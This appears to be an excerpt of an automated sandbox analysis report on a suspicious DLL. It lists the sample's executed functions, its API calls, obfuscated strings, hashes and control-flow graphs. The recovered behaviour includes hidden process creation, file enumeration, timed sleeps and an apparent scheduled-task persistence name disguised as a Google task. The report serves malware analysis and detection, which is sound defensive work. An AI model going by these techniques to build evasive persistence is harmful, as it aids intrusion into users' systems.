15925->15926 15928 6beedef9 __wsopen_s 39 API calls 15926->15928 15930 6bee2032 15928->15930 15929 6bef0431 __dosmaperr 14 API calls 15929->15930 15930->14733 15931 6beed1e0 15930->15931 15932 6beed1f3 __vfwprintf_l 15931->15932 16020 6beecf71 15932->16020 15935 6bee7d4e __vfwprintf_l 39 API calls 15936 6bee204b 15935->15936 15937 6bee81bf 15936->15937 15938 6bee81d2 __vfwprintf_l 15937->15938 16080 6bee7ab3 15938->16080 15941 6bee7d4e __vfwprintf_l 39 API calls 15942 6bee2056 15941->15942 15943 6beecec7 15942->15943 15944 6beeceda __vfwprintf_l 15943->15944 16150 6beecda2 15944->16150 15946 6beecee6 15947 6bee7d4e __vfwprintf_l 39 API calls 15946->15947 15948 6bee2062 15947->15948 15948->14702 16226 6beedbb6 15949->16226 15953 6beecb21 __vfwprintf_l __DllMainCRTStartup@12 15952->15953 16364 6beec7ee 15953->16364 15967 6beeccb1 __FrameHandler3::FrameUnwindToState 15964->15967 15965 6beeccb8 15966 6bef0431 __dosmaperr 14 API calls 15965->15966 15969 6beeccbd 15966->15969 15967->15965 15968 6beeccda 15967->15968 15970 6beeccdf 15968->15970 15971 6beeccec 15968->15971 15972 6beedef9 __wsopen_s 39 API calls 15969->15972 15973 6bef0431 __dosmaperr 14 API calls 15970->15973 15981 6bef1e6f 15971->15981 15975 6beeccc8 15972->15975 15973->15975 15975->15929 15975->15930 15977 6beeccfb 15979 6bef0431 __dosmaperr 14 API calls 15977->15979 15978 6beecd08 __DllMainCRTStartup@12 15989 6beecd44 15978->15989 15979->15975 15982 6bef1e7b __FrameHandler3::FrameUnwindToState 15981->15982 15993 6bef351f RtlEnterCriticalSection 15982->15993 15984 6bef1e89 15994 6bef1f13 15984->15994 15991 6beecd48 __DllMainCRTStartup@12 15989->15991 16019 6beecc91 RtlLeaveCriticalSection 15991->16019 15992 6beecd59 15992->15975 15993->15984 16003 6bef1f36 15994->16003 15995 6bef1e96 16007 6bef1ecf 15995->16007 15996 6bef1f8e 15997 6bef1658 _unexpected 14 API calls 15996->15997 15998 6bef1f97 15997->15998 16000 6bef0444 __freea 14 API calls 15998->16000 16001 6bef1fa0 16000->16001 16001->15995 16012 6bef19b1 16001->16012 16003->15995 16003->15996 16010 6beecc7d RtlEnterCriticalSection 16003->16010 16011 6beecc91 RtlLeaveCriticalSection 16003->16011 16018 6bef3567 RtlLeaveCriticalSection 16007->16018 16009 6beeccf5 16009->15977 16009->15978 16010->16003 16011->16003 16013 6bef17ce _unexpected 5 API calls 16012->16013 16014 6bef19cd 16013->16014 16015 6bef19eb InitializeCriticalSectionAndSpinCount 16014->16015 16016 6bef19d6 16014->16016 16015->16016 16017 6beecc7d RtlEnterCriticalSection 16016->16017 16017->15995 16018->16009 16019->15992 16021 6beecf7d __FrameHandler3::FrameUnwindToState 16020->16021 16022 6beecf83 16021->16022 16025 6beecfc6 16021->16025 16023 6beede7c __vfwprintf_l 29 API calls 16022->16023 16024 6beecf9e 16023->16024 16024->15935 16031 6beecc7d RtlEnterCriticalSection 16025->16031 16027 6beecfd2 16032 6beed0f4 16027->16032 16029 6beecfe8 16041 6beed011 16029->16041 16031->16027 16033 6beed11a 16032->16033 16034 6beed107 16032->16034 16044 6beed01b 16033->16044 16034->16029 16036 6beed1cb 16036->16029 16037 6beed13d __DllMainCRTStartup@12 16037->16036 16038 6bef1d58 __vfwprintf_l 64 API calls 16037->16038 16039 6beed16b 16038->16039 16048 6beef10f 16039->16048 16079 6beecc91 RtlLeaveCriticalSection 16041->16079 16043 6beed019 16043->16024 16045 6beed02c 16044->16045 16047 6beed084 __DllMainCRTStartup@12 16044->16047 16045->16047 16051 6beef0cf 16045->16051 16047->16037 16049 6beeefee __wsopen_s 41 API calls 16048->16049 16050 6beef128 16049->16050 16050->16036 16052 6beef0e3 __vfwprintf_l 16051->16052 16057 6beeefee 16052->16057 16054 6beef0f8 16055 6bee7d4e __vfwprintf_l 39 API calls 16054->16055 16056 6beef107 16055->16056 16056->16047 16063 6bef52de 16057->16063 16059 6beef000 16060 6beef01c SetFilePointerEx 16059->16060 16062 6beef008 __wsopen_s 16059->16062 16061 6beef034 GetLastError 16060->16061 16060->16062 16061->16062 16062->16054 16064 6bef52eb 16063->16064 16065 6bef5300 16063->16065 16076 6bef041e 16064->16076 16068 6bef041e __dosmaperr 14 API calls 16065->16068 16071 6bef5325 16065->16071 16069 6bef5330 16068->16069 16072 6bef0431 __dosmaperr 14 API calls 16069->16072 16070 6bef0431 __dosmaperr 14 API calls 16073 6bef52f8 16070->16073 16071->16059 16074 6bef5338 16072->16074 16073->16059 16075 6beedef9 __wsopen_s 39 API calls 16074->16075 16075->16073 16077 6beef5e8 __dosmaperr 14 API calls 16076->16077 16078 6bef0423 16077->16078 16078->16070 16079->16043 16081 6bee7abf __FrameHandler3::FrameUnwindToState 16080->16081 16082 6bee7ac6 16081->16082 16083 6bee7ae7 16081->16083 16085 6beede7c __vfwprintf_l 29 API calls 16082->16085 16091 6beecc7d RtlEnterCriticalSection 16083->16091 16087 6bee7adf 16085->16087 16086 6bee7af2 16092 6bee7b33 16086->16092 16087->15941 16091->16086 16098 6bee7b65 16092->16098 16094 6bee7b01 16095 6bee7b29 16094->16095 16149 6beecc91 RtlLeaveCriticalSection 16095->16149 16097 6bee7b31 16097->16087 16099 6bee7b9c 16098->16099 16100 6bee7b74 16098->16100 16102 6beeeea2 __fread_nolock 39 API calls 16099->16102 16101 6beede7c __vfwprintf_l 29 API calls 16100->16101 16110 6bee7b8f __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 16101->16110 16103 6bee7ba5 16102->16103 16111 6beef0b1 16103->16111 16106 6bee7c4f 16114 6bee7f55 16106->16114 16108 6bee7c66 __DllMainCRTStartup@12 16108->16110 16126 6bee7d8a 16108->16126 16110->16094 16133 6beeeec9 16111->16133 16115 6bee7f64 __wsopen_s 16114->16115 16116 6beeeea2 __fread_nolock 39 API calls 16115->16116 16117 6bee7f80 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 16116->16117 16119 6beef0b1 __DllMainCRTStartup@12 43 API calls 16117->16119 16125 6bee7f8c 16117->16125 16118 6bee4ad5 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 16120 6bee80fe 16118->16120 16121 6bee7fe0 16119->16121 16120->16110 16122 6bee8012 ReadFile 16121->16122 16121->16125 16123 6bee8039 16122->16123 16122->16125 16124 6beef0b1 __DllMainCRTStartup@12 43 API calls 16123->16124 16124->16125 16125->16118 16127 6beeeea2 __fread_nolock 39 API calls 16126->16127 16128 6bee7d9d 16127->16128 16129 6bee7de7 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __DllMainCRTStartup@12 16128->16129 16130 6beef0b1 __DllMainCRTStartup@12 43 API calls 16128->16130 16129->16110 16131 6bee7e44 16130->16131 16131->16129 16132 6beef0b1 __DllMainCRTStartup@12 43 API calls 16131->16132 16132->16129 16134 6beeeed5 __FrameHandler3::FrameUnwindToState 16133->16134 16135 6beeef18 16134->16135 16136 6beeef5e 16134->16136 16143 6bee7bc3 16134->16143 16137 6beede7c __vfwprintf_l 29 API calls 16135->16137 16144 6bef5062 RtlEnterCriticalSection 16136->16144 16137->16143 16139 6beeef64 16140 6beeef85 16139->16140 16141 6beeefee __wsopen_s 41 API calls 16139->16141 16145 6beeefe6 16140->16145 16141->16140 16143->16106 16143->16108 16143->16110 16144->16139 16148 6bef5117 RtlLeaveCriticalSection 16145->16148 16147 6beeefec 16147->16143 16148->16147 16149->16097 16151 6beecdae __FrameHandler3::FrameUnwindToState 16150->16151 16152 6beecddb 16151->16152 16153 6beecdb8 16151->16153 16160 6beecdd3 __DllMainCRTStartup@12 16152->16160 16161 6beecc7d RtlEnterCriticalSection 16152->16161 16154 6beede7c __vfwprintf_l 29 API calls 16153->16154 16154->16160 16156 6beecdf9 16162 6beece39 16156->16162 16158 6beece06 16176 6beece31 16158->16176 16160->15946 16161->16156 16163 6beece69 16162->16163 16164 6beece46 16162->16164 16166 6bef1d58 __vfwprintf_l 64 API calls 16163->16166 16174 6beece61 __DllMainCRTStartup@12 16163->16174 16165 6beede7c __vfwprintf_l 29 API calls 16164->16165 16165->16174 16167 6beece81 16166->16167 16179 6bef1e2f 16167->16179 16170 6beeeea2 __fread_nolock 39 API calls 16171 6beece95 16170->16171 16183 6bef2473 16171->16183 16174->16158 16175 6bef0444 __freea 14 API calls 16175->16174 16225 6beecc91 RtlLeaveCriticalSection 16176->16225 16178 6beece37 16178->16160 16180 6bef1e46 16179->16180 16182 6beece89 16179->16182 16181 6bef0444 __freea 14 API calls 16180->16181 16180->16182 16181->16182 16182->16170 16185 6beece9c 16183->16185 16186 6bef249c 16183->16186 16184 6bef24eb 16187 6beede7c __vfwprintf_l 29 API calls 16184->16187 16185->16174 16185->16175 16186->16184 16188 6bef24c3 16186->16188 16187->16185 16190 6bef23e2 16188->16190 16191 6bef23ee __FrameHandler3::FrameUnwindToState 16190->16191 16225->16178 16227 6beedbc2 __FrameHandler3::FrameUnwindToState 16226->16227 16228 6beedc0c 16227->16228 16230 6beedbd5 __fread_nolock 16227->16230 16238 6beedbb1 16227->16238 16239 6beecc7d RtlEnterCriticalSection 16228->16239 16231 6bef0431 __dosmaperr 14 API calls 16230->16231 16233 6beedbef 16231->16233 16232 6beedc16 16240 6beed9c0 16232->16240 16235 6beedef9 __wsopen_s 39 API calls 16233->16235 16235->16238 16238->14705 16239->16232 16243 6beed9d2 __fread_nolock 16240->16243 16246 6beed9ef 16240->16246 16241 6beed9df 16243->16241 16243->16246 16251 6beeda30 __fread_nolock 16243->16251 16253 6beedc4b 16246->16253 16251->16246 16365 6beec37b __vfwprintf_l 39 API calls 16364->16365 16498->14743

              Executed Functions

              Function 6BEE1B85 Relevance: 35.3, APIs: 11, Strings: 9, Instructions: 303fileCOMMONLIBRARYCODE
              Download Yara Rule

              Control-flow Graph

              APIs
              • FindFirstFileW.KERNELBASE(?,?,?,?,?,316303B8), ref: 6BEE1C0B
              • _strlen.LIBCMT ref: 6BEE1D30
              • ExpandEnvironmentStringsW.KERNEL32(?,?,000000FF), ref: 6BEE1D9D
              • FindNextFileW.KERNELBASE(?,?,?,?,?,316303B8), ref: 6BEE1FAC
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2161385477.000000006BEE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 6BEE0000, based on PE: true
              • Associated: 00000000.00000002.2161368422.000000006BEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF06000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF0B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161450529.000000006BF0D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161466522.000000006BF0E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6bee0000_loaddll32.jbxd
              Similarity
              • API ID: FileFind$EnvironmentExpandFirstNextStrings_strlen
              • String ID: %s\%s$%s\%s$%s\%s$%s\*.*$-a $GoogleRegisterTask$IRA3BDVBaRAtB@VB[BAzBDVBYtAsBKRBOdApBD7BbtB>$PT30S$s`bovb-f{f
              • API String ID: 4146766196-3364674013
              • Opcode ID: bb3a420eba7aeabce63e2fb95ee13f917c11a8267c7a8b6a6f9f58e947cdaff6
              • Instruction ID: 22482656f092e4683b9f7f92fb432bd9de3a650c929af0b4233837df695f8a93
              • Opcode Fuzzy Hash: bb3a420eba7aeabce63e2fb95ee13f917c11a8267c7a8b6a6f9f58e947cdaff6
              • Instruction Fuzzy Hash: 95C1C1B1904249EBDF20DFA4DC06FED3BB8BB05304F604069F905DA1A1EB39DA85DB61
              Function 6BEE4402 Relevance: 31.8, APIs: 9, Strings: 9, Instructions: 260sleepCOMMONLIBRARYCODE
              Download Yara Rule

              Control-flow Graph

              APIs
                • Part of subcall function 6BEE171F: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 6BEE175A
                • Part of subcall function 6BEE171F: _strlen.LIBCMT ref: 6BEE177C
                • Part of subcall function 6BEE171F: GetProcAddress.KERNEL32(?), ref: 6BEE17E2
                • Part of subcall function 6BEE171F: _strlen.LIBCMT ref: 6BEE180D
              • _strlen.LIBCMT ref: 6BEE4460
              • GetEnvironmentVariableW.KERNEL32(?,?,00000032), ref: 6BEE44CA
              • _strlen.LIBCMT ref: 6BEE44F0
              • _strlen.LIBCMT ref: 6BEE4571
              • _strlen.LIBCMT ref: 6BEE45E8
                • Part of subcall function 6BEE192F: _strlen.LIBCMT ref: 6BEE19BD
                • Part of subcall function 6BEE192F: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,6BF074C4), ref: 6BEE1A5E
              • Sleep.KERNELBASE(000005DC), ref: 6BEE4654
              • Sleep.KERNELBASE(00007530), ref: 6BEE465F
              • _strlen.LIBCMT ref: 6BEE4685
              • _strlen.LIBCMT ref: 6BEE4706
                • Part of subcall function 6BEE1B85: FindFirstFileW.KERNELBASE(?,?,?,?,?,316303B8), ref: 6BEE1C0B
              Strings
              • %s%s, xrefs: 6BEE46C4
              • bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;BZRAiBDtBatAmB@7BgBA7BKRB, xrefs: 6BEE45C8
              • [BAABKBB`BAFBDFBgBAkBEtBVdAuBDFBaRAsBD7BYtA`BF3BbRAiBKJBatAyBD;BYdA3BEtBRtAzBKhB`BA3BD;B[BAiBKJBfRAtBKRBLBB1B@7BYBAkBKRB, xrefs: 6BEE44D0
              • [BAABKBB`BAFBDFBgBAkBEtBVdAuBDFBaRAsBD7BYtA`BF3BbRAiBKJBatAyBD;BYdA3BEtBUdAkBKVBaBA3BEtBVtAoBDNBgRAzBDVBRdAuBD;BgBAUBFVBQdAIB@7BYBAkBB>>, xrefs: 6BEE46E6
              • VtAuBDZBgBA0BDFB`dAoBEtBRtApBDFB`tAyBDVB`tA`BFNBWBAWBFhBQBA`BKpBNBAjBGhBNRAkBG`BMBAjB@3BZRAhBG`BZtBwBGRBZRB6BDRBORAjBGVBMdByB@3BNdB6BDVBYRAnBGhBNRB1BG`BNRB0BGJBeRA`BFhBadAtBKJBatAiBENBYRAzBKZBYRAzBGNBNdB>, xrefs: 6BEE4551
              • %s%s, xrefs: 6BEE452F
              • gRAyBDVB`dAtBKJBatAnBDhBaBAoBB>>, xrefs: 6BEE4440
              • %s%s, xrefs: 6BEE4745
              • [BAABKBB`BAFBDFBgBAkBEtBWBAuBDNBZRApBEtBWRAsBDNB`dAuBKNBatAnBKRB[BA[BDhBadAhBD;BgtAyBEtBPRALBDVBgBAGBDFBZtAlBDVB[BAIBFVB, xrefs: 6BEE4665
              Memory Dump Source
              • Source File: 00000000.00000002.2161385477.000000006BEE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 6BEE0000, based on PE: true
              • Associated: 00000000.00000002.2161368422.000000006BEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF06000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF0B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161450529.000000006BF0D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161466522.000000006BF0E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6bee0000_loaddll32.jbxd
              Similarity
              • API ID: _strlen$Sleep$AddressCreateEnvironmentFileFindFirstHandleModuleProcProcessVariable
              • String ID: %s%s$%s%s$%s%s$VtAuBDZBgBA0BDFB`dAoBEtBRtApBDFB`tAyBDVB`tA`BFNBWBAWBFhBQBA`BKpBNBAjBGhBNRAkBG`BMBAjB@3BZRAhBG`BZtBwBGRBZRB6BDRBORAjBGVBMdByB@3BNdB6BDVBYRAnBGhBNRB1BG`BNRB0BGJBeRA`BFhBadAtBKJBatAiBENBYRAzBKZBYRAzBGNBNdB>$[BAABKBB`BAFBDFBgBAkBEtBVdAuBDFBaRAsBD7BYtA`BF3BbRAiBKJBatAyBD;BYdA3BEtBRtAzBKhB`BA3BD;B[BAiBKJBfRAtBKRBLBB1B@7BYBAkBKRB$[BAABKBB`BAFBDFBgBAkBEtBVdAuBDFBaRAsBD7BYtA`BF3BbRAiBKJBatAyBD;BYdA3BEtBUdAkBKVBaBA3BEtBVtAoBDNBgRAzBDVBRdAuBD;BgBAUBFVBQdAIB@7BYBAkBB>>$[BAABKBB`BAFBDFBgBAkBEtBWBAuBDNBZRApBEtBWRAsBDNB`dAuBKNBatAnBKRB[BA[BDhBadAhBD;BgtAyBEtBPRALBDVBgBAGBDFBZtAlBDVB[BAIBFVB$bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;BZRAiBDtBatAmB@7BgBA7BKRB$gRAyBDVB`dAtBKJBatAnBDhBaBAoBB>>
              • API String ID: 405535372-2132796354
              • Opcode ID: 288a13779b8c475d641da619b79603d5828e07265e1c806321945be78445982b
              • Instruction ID: 24e5d7b0d2d919a20b46932cb998c66671b6fd15010d3c71c55cf28d10369c2d
              • Opcode Fuzzy Hash: 288a13779b8c475d641da619b79603d5828e07265e1c806321945be78445982b
              • Instruction Fuzzy Hash: 90A10CB2C4025CABDF31DBE8DC86FDD7BB8AF08208F14401AE514A7152EF3996598F65
              Function 6BEE192F Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 174processCOMMONLIBRARYCODE
              Download Yara Rule

              Control-flow Graph

              APIs
              • _strlen.LIBCMT ref: 6BEE19BD
              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,6BF074C4), ref: 6BEE1A5E
              • _strlen.LIBCMT ref: 6BEE1AC4
              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,6BF074E0), ref: 6BEE1B60
              Strings
              • %s %s, xrefs: 6BEE1B26
              • `dA2BD7BYBApBDtBNtBzB@7BYRA7BDVBJBAGBGlB[BA[BDhBadAhBD;BgtAyBEtBVtA6BKNBgBAoBD3BNtBzBEtB`tAlBDhBaRAmBKZBgtBvBDRBaBApB@tBPRAwBDFBYtAoBEZBbRAoBK`B[tADBKVBaBApBKNBZtAzBDVBYRAvBB>>, xrefs: 6BEE199D
              • bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;B`dAoBD`BbRA3B@7BgBAwBKBB, xrefs: 6BEE1AA4
              • %s %s, xrefs: 6BEE1A24
              Memory Dump Source
              • Source File: 00000000.00000002.2161385477.000000006BEE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 6BEE0000, based on PE: true
              • Associated: 00000000.00000002.2161368422.000000006BEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF06000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF0B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161450529.000000006BF0D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161466522.000000006BF0E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6bee0000_loaddll32.jbxd
              Similarity
              • API ID: CreateProcess_strlen
              • String ID: %s %s$%s %s$`dA2BD7BYBApBDtBNtBzB@7BYRA7BDVBJBAGBGlB[BA[BDhBadAhBD;BgtAyBEtBVtA6BKNBgBAoBD3BNtBzBEtB`tAlBDhBaRAmBKZBgtBvBDRBaBApB@tBPRAwBDFBYtAoBEZBbRAoBK`B[tADBKVBaBApBKNBZtAzBDVBYRAvBB>>$bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;B`dAoBD`BbRA3B@7BgBAwBKBB
              • API String ID: 3222040079-4228346574
              • Opcode ID: 654068aad079cb806c8d46102f7e2b28fbba9ed25b0e4216fbbae32918317186
              • Instruction ID: 755975a60acb6d04c461873ee48bc8d5a64cc69ac63c941446db3c89d0dd1ce0
              • Opcode Fuzzy Hash: 654068aad079cb806c8d46102f7e2b28fbba9ed25b0e4216fbbae32918317186
              • Instruction Fuzzy Hash: 305166B2D40248ABEB20DFF4DC42FDD77B8AF04748F240019F618E6191EBB9A6558B65
              Function 6BEE4D53 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 192 6bee4d53-6bee4d64 call 6bee5570 195 6bee4d66-6bee4d6c 192->195 196 6bee4d75-6bee4d7c 192->196 195->196 197 6bee4d6e-6bee4d70 195->197 198 6bee4d7e-6bee4d81 196->198 199 6bee4d88-6bee4d9c dllmain_raw 196->199 200 6bee4e4e-6bee4e5d 197->200 198->199 201 6bee4d83-6bee4d86 198->201 202 6bee4e45-6bee4e4c 199->202 203 6bee4da2-6bee4db3 dllmain_crt_dispatch 199->203 204 6bee4db9-6bee4dbe call 6bee1000 201->204 202->200 203->202 203->204 206 6bee4dc3-6bee4dcb 204->206 207 6bee4dcd-6bee4dcf 206->207 208 6bee4df4-6bee4df6 206->208 207->208 209 6bee4dd1-6bee4def call 6bee1000 call 6bee4ca3 dllmain_raw 207->209 210 6bee4dfd-6bee4e0e dllmain_crt_dispatch 208->210 211 6bee4df8-6bee4dfb 208->211 209->208 210->202 213 6bee4e10-6bee4e42 dllmain_raw 210->213 211->202 211->210 213->202
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2161385477.000000006BEE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 6BEE0000, based on PE: true
              • Associated: 00000000.00000002.2161368422.000000006BEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF06000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF0B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161450529.000000006BF0D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161466522.000000006BF0E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6bee0000_loaddll32.jbxd
              Similarity
              • API ID: dllmain_raw$dllmain_crt_dispatch
              • String ID:
              • API String ID: 3136044242-0
              • Opcode ID: a49a85cb2a31dbcc8a730eaf23912b8b77f5128d327c1f982895dbf4000feca4
              • Instruction ID: 6679847cc9f9292a90d0af25d7fa286c522bd3dadc09ca677b5b9d10b92a3f9f
              • Opcode Fuzzy Hash: a49a85cb2a31dbcc8a730eaf23912b8b77f5128d327c1f982895dbf4000feca4
              • Instruction Fuzzy Hash: 6E219172D00629AFDB214F65CC41A6F3B79EB85B98F21415BF8245B224D3398E538BB0
              Function 6BEE4B9C Relevance: 3.1, APIs: 2, Instructions: 76COMMON
              Download Yara Rule

              Control-flow Graph

              APIs
              • __RTC_Initialize.LIBCMT ref: 6BEE4BE9
                • Part of subcall function 6BEE50D5: RtlInitializeSListHead.NTDLL(6BF06DC0), ref: 6BEE50DA
              • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6BEE4C53
              Memory Dump Source
              • Source File: 00000000.00000002.2161385477.000000006BEE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 6BEE0000, based on PE: true
              • Associated: 00000000.00000002.2161368422.000000006BEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF06000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF0B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161450529.000000006BF0D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161466522.000000006BF0E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6bee0000_loaddll32.jbxd
              Similarity
              • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
              • String ID:
              • API String ID: 3231365870-0
              • Opcode ID: fe637fce3ebc5bf57a9c2795b32d1f79b352c0252e63d4767e067a4f65c675a4
              • Instruction ID: f458166c8bd5044dba770b9c17a20bfc61626acbd43a8ec129a14be4015c3b68
              • Opcode Fuzzy Hash: fe637fce3ebc5bf57a9c2795b32d1f79b352c0252e63d4767e067a4f65c675a4
              • Instruction Fuzzy Hash: A021F036648301AAEB10ABB4881639C37F1AF1632DF30448EE645672D0DB2E6157D675
              Function 6BEF0258 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 261 6bef0258-6bef025d 262 6bef025f-6bef0277 261->262 263 6bef0279-6bef027d 262->263 264 6bef0285-6bef028e 262->264 263->264 265 6bef027f-6bef0283 263->265 266 6bef02a0 264->266 267 6bef0290-6bef0293 264->267 269 6bef02fa-6bef02fe 265->269 268 6bef02a2-6bef02af GetStdHandle 266->268 270 6bef029c-6bef029e 267->270 271 6bef0295-6bef029a 267->271 272 6bef02dc-6bef02ee 268->272 273 6bef02b1-6bef02b3 268->273 269->262 274 6bef0304-6bef0307 269->274 270->268 271->268 272->269 276 6bef02f0-6bef02f3 272->276 273->272 275 6bef02b5-6bef02be GetFileType 273->275 275->272 277 6bef02c0-6bef02c9 275->277 276->269 278 6bef02cb-6bef02cf 277->278 279 6bef02d1-6bef02d4 277->279 278->269 279->269 280 6bef02d6-6bef02da 279->280 280->269
              APIs
              • GetStdHandle.KERNEL32(000000F6), ref: 6BEF02A4
              • GetFileType.KERNELBASE(00000000), ref: 6BEF02B6
              Memory Dump Source
              • Source File: 00000000.00000002.2161385477.000000006BEE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 6BEE0000, based on PE: true
              • Associated: 00000000.00000002.2161368422.000000006BEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF06000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF0B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161450529.000000006BF0D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161466522.000000006BF0E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6bee0000_loaddll32.jbxd
              Similarity
              • API ID: FileHandleType
              • String ID:
              • API String ID: 3000768030-0
              • Opcode ID: 1c2f065701d6b568efe20e6bab2c2c5e8cdc1f23af4b95d3f131688a12e03cac
              • Instruction ID: cf1defb6c1a03187a354203713a03323a9753a9baf82a20d9d8cf2b5cf638d6b
              • Opcode Fuzzy Hash: 1c2f065701d6b568efe20e6bab2c2c5e8cdc1f23af4b95d3f131688a12e03cac
              • Instruction Fuzzy Hash: A411B4716047524AEB228E3ECC84712BB9CA74B375B34079AD0B6966F3C738D5978260
              Function 6BEF1658 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 281 6bef1658-6bef1663 282 6bef1665-6bef166f 281->282 283 6bef1671-6bef1677 281->283 282->283 284 6bef16a5-6bef16b0 call 6bef0431 282->284 285 6bef1679-6bef167a 283->285 286 6bef1690-6bef16a1 RtlAllocateHeap 283->286 291 6bef16b2-6bef16b4 284->291 285->286 287 6bef167c-6bef1683 call 6bef5ac9 286->287 288 6bef16a3 286->288 287->284 294 6bef1685-6bef168e call 6beedf8f 287->294 288->291 294->284 294->286
              APIs
              • RtlAllocateHeap.NTDLL(00000008,6BEE1775,6BEEC75A), ref: 6BEF1699
              Memory Dump Source
              • Source File: 00000000.00000002.2161385477.000000006BEE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 6BEE0000, based on PE: true
              • Associated: 00000000.00000002.2161368422.000000006BEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF06000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF0B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161450529.000000006BF0D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161466522.000000006BF0E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6bee0000_loaddll32.jbxd
              Similarity
              • API ID: AllocateHeap
              • String ID:
              • API String ID: 1279760036-0
              • Opcode ID: 42314b988e7d4ee8852907fe2917ecfbac33cad8a265e7db41b3af459870ab92
              • Instruction ID: 7859c14feda37ece145cdf415e6c4c5b61ee89ff58d369f093d2bb5aede9f69c
              • Opcode Fuzzy Hash: 42314b988e7d4ee8852907fe2917ecfbac33cad8a265e7db41b3af459870ab92
